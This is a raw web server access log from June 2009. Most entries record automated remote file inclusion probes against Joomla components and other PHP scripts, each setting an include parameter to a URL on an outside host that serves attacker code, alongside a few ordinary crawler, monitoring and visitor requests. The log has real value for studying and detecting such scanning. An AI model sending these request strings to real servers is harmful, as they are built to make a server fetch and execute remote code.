123.143.98.5 - - [15/Jun/2009:00:14:15 -0400] "GET /logs/access_log.Q109052600%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:14:17 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:14:22 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:14:22 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:14:22 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [15/Jun/2009:00:14:28 -0400] "GET /images/index15_stopck.jpg HTTP/1.1" 200 2650 "-" "Googlebot-Image/1.0"
140.112.125.75 - - [15/Jun/2009:00:14:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L002569486BF27300155F019+M37+ENG HTTP/1.1" 200 59324 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
210.112.121.225 - - [15/Jun/2009:00:15:11 -0400] "GET /logs/access_log.Q109060600//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:15:11 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:15:11 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.149.105.23 - - [15/Jun/2009:00:15:15 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [15/Jun/2009:00:16:26 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:16:27 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:16:54 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:16:54 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:16:55 -0400] "GET /logs/error_log.Q108072200%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:16:56 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:17:11 -0400] "GET /logs/access_log.Q109052200%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
210.112.121.225 - - [15/Jun/2009:00:17:11 -0400] "GET /logs/access_log.Q109060600%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:17:38 -0400] "GET /?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:17:38 -0400] "GET /logs/error_log.Q108122800%20%20/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:17:38 -0400] "GET /logs/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 5572 "-" "Mozilla/5.0"
208.80.195.42 - - [15/Jun/2009:00:17:57 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
210.112.121.225 - - [15/Jun/2009:00:18:16 -0400] "GET /?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:18:16 -0400] "GET /logs/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 5572 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:18:16 -0400] "GET /logs/access_log.Q109060500/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:18:21 -0400] "GET /logs/access_log.Q109053100/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.129.216.60 - - [15/Jun/2009:00:19:03 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://www.mirsoft.info/temp/0sirys.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
202.129.216.60 - - [15/Jun/2009:00:19:03 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mirsoft.info/temp/0sirys.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
202.129.216.60 - - [15/Jun/2009:00:19:03 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mirsoft.info/temp/0sirys.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jun/2009:00:19:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [15/Jun/2009:00:19:17 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:00:19:51 -0400] "GET /logs/error_log.Q108110600%20%20/?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.149.105.23 - - [15/Jun/2009:00:20:11 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
213.149.105.23 - - [15/Jun/2009:00:20:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
213.149.105.23 - - [15/Jun/2009:00:20:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
123.143.98.5 - - [15/Jun/2009:00:20:22 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:00:21:09 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:00:21:37 -0400] "GET //?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:37 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:37 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:00:21:41 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:00:21:44 -0400] "GET //?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:44 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:44 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:49 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:49 -0400] "GET //?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:21:49 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
79.174.72.67 - - [15/Jun/2009:00:21:57 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
79.174.72.67 - - [15/Jun/2009:00:21:58 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:00:22:02 -0400] "GET //?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:22:02 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:22:02 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:22:46 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:00:23:08 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.172.33.230 - - [15/Jun/2009:00:23:12 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.172.33.230 - - [15/Jun/2009:00:23:12 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.172.33.230 - - [15/Jun/2009:00:23:12 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.120.237.150 - - [15/Jun/2009:00:23:19 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:23:19 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:23:19 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
210.115.58.73 - - [15/Jun/2009:00:23:41 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
213.149.105.23 - - [15/Jun/2009:00:23:46 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
213.33.143.3 - - [15/Jun/2009:00:23:55 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
213.33.143.3 - - [15/Jun/2009:00:23:56 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.33.143.3 - - [15/Jun/2009:00:23:56 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jun/2009:00:24:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.4 - - [15/Jun/2009:00:24:18 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.4 - - [15/Jun/2009:00:24:18 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.4 - - [15/Jun/2009:00:24:19 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.172.33.230 - - [15/Jun/2009:00:24:28 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:00:24:42 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:00:24:42 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:00:24:42 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.120.237.150 - - [15/Jun/2009:00:24:56 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:24:56 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:24:57 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:25:38 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:25:38 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:25:38 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
204.3.188.171 - - [15/Jun/2009:00:26:32 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.188.171 - - [15/Jun/2009:00:26:32 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
204.3.188.171 - - [15/Jun/2009:00:26:32 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.0" 404 276 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:00:26:35 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.212.64.10 - - [15/Jun/2009:00:26:52 -0400] "GET /phphtml.php?htmlclass_path=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:26:52 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:26:52 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:26:52 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.63"
213.33.143.3 - - [15/Jun/2009:00:26:55 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
213.33.143.3 - - [15/Jun/2009:00:26:56 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.33.143.3 - - [15/Jun/2009:00:26:56 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
77.221.130.4 - - [15/Jun/2009:00:26:59 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
77.221.130.4 - - [15/Jun/2009:00:27:01 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.130.4 - - [15/Jun/2009:00:27:01 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
216.120.237.150 - - [15/Jun/2009:00:27:23 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
204.3.188.171 - - [15/Jun/2009:00:27:24 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.0" 404 276 "-" "Mozilla/5.0"
62.212.64.10 - - [15/Jun/2009:00:27:24 -0400] "GET /logs/access_log.Q109052400%20/phphtml.php?htmlclass_path=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.63"
62.128.135.52 - - [15/Jun/2009:00:27:48 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:27:48 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:27:48 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.34.133.35 - - [15/Jun/2009:00:28:32 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.34.133.35 - - [15/Jun/2009:00:28:32 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.34.133.35 - - [15/Jun/2009:00:28:32 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.146.231.193 - - [15/Jun/2009:00:28:48 -0400] "GET /?sourcedir=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.146.231.193 - - [15/Jun/2009:00:28:48 -0400] "GET /logs/?sourcedir=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 200 5572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.120.237.150 - - [15/Jun/2009:00:28:55 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:00:29:01 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
209.59.12.99 - - [15/Jun/2009:00:29:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.4 - - [15/Jun/2009:00:29:06 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:29:06 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.33.143.3 - - [15/Jun/2009:00:29:12 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
79.174.72.67 - - [15/Jun/2009:00:29:27 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
79.174.72.67 - - [15/Jun/2009:00:29:27 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:29:45 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:29:45 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:29:45 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
79.174.72.67 - - [15/Jun/2009:00:29:50 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
66.34.133.35 - - [15/Jun/2009:00:30:03 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
79.174.72.67 - - [15/Jun/2009:00:30:18 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
79.174.72.67 - - [15/Jun/2009:00:30:18 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:31:58 -0400] "GET /logs/access_log.Q109052900//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:00:32:02 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:00:32:02 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:00:32:12 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
208.106.72.126 - - [15/Jun/2009:00:33:12 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
208.106.72.126 - - [15/Jun/2009:00:33:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
208.106.72.126 - - [15/Jun/2009:00:33:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
